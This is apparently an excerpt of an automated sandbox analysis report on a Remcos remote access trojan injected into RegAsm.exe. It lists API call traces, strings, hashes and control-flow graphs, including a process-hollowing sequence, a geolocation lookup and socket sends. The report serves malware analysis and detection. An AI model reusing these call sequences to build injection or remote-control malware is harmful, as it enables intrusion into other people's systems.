                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                            • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad$HandleModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 4236061018-3687161714
                            • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                            • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                            • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                            • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                            • GetProcAddress.KERNEL32(00000000), ref: 00418174
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                            • GetProcAddress.KERNEL32(00000000), ref: 00418188
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                            • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                            • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                            • NtClose.NTDLL(?), ref: 00418332
                            • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                            • ResumeThread.KERNEL32(?), ref: 00418470
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                            • GetCurrentProcess.KERNEL32(?), ref: 00418492
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                            • NtClose.NTDLL(?), ref: 004184A3
                            • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                            • GetLastError.KERNEL32 ref: 004184B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 316982871-3035715614
                            • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                            • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                            • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                            • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                            Control-flow Graph (function 100010f1; graph rendering not recoverable from text)

                            APIs
                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • lstrcatW.KERNEL32(?,?), ref: 10001151
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • FindClose.KERNEL32(00000000), ref: 100011DB
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                            • String ID:
                            • API String ID: 1083526818-0
                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                              • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                              • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                            • Sleep.KERNEL32(00000BB8), ref: 0040F896
                            • ExitProcess.KERNEL32 ref: 0040F905
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.1.1 Pro$`.S$override$pth_unenc
                            • API String ID: 2281282204-4241259013
                            • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                            • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                            • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                            • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                            Control-flow Graph (function 41b411; graph rendering not recoverable from text)

                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                            • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                            • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041B448
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                            • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                            • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                            • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                            APIs
                              • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                            • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                            • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                            • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                              • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                              • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                              • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                            • String ID:
                            • API String ID: 3950776272-0
                            • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                            • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                            • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                            • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,005395D0), ref: 004338DA
                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                            Strings
                            • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileSystem
                            • String ID: GetSystemTimePreciseAsFileTime
                            • API String ID: 2086374402-595813830
                            • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                            • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                            • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                            • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                            APIs
                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                            • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                            • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                            • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                            • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                            • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                            • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                            • Instruction Fuzzy Hash:

                            Control-flow Graph (function 40ea00; graph rendering not recoverable from text)

                            APIs
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                              • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: 0oS$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-OT0ZCG$Software\$User$`.S$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                            • API String ID: 2830904901-805712278
                            • Opcode ID: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                            • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                            • Opcode Fuzzy Hash: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                            • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                            Control-flow Graph (function 414f65; graph rendering not recoverable from text)

                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                            • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$0oS$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-OT0ZCG$TLS Off$TLS On $`.S$dMG$hlight$name$NG$NG$PG$PG$PG
                            • API String ID: 524882891-2344609257
                            • Opcode ID: 79288536e4165c6157248710647f71f23426609ae1f89b193eceedb6e23a3c7b
                            • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                            • Opcode Fuzzy Hash: 79288536e4165c6157248710647f71f23426609ae1f89b193eceedb6e23a3c7b
                            • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                            Control-flow Graph

                            control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1093 412e43-412e5f call 401f04 call 41c516 1091->1093 1092->1093 1100 412e61-412e73 call 401f04 DeleteFileW 1093->1100 1101 412e79-412e7b 1093->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1137 412eff 1123->1137 1137->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                            • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                            • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                            • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                            • Sleep.KERNEL32(00000064), ref: 00412ECF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$0TG$0TG$NG$NG
                            • API String ID: 1223786279-2576077980
                            • Opcode ID: 5f6935a44d2555e3a9d5795660cee6edaaf8ceb71c721b5c00cde1a7094d04b6
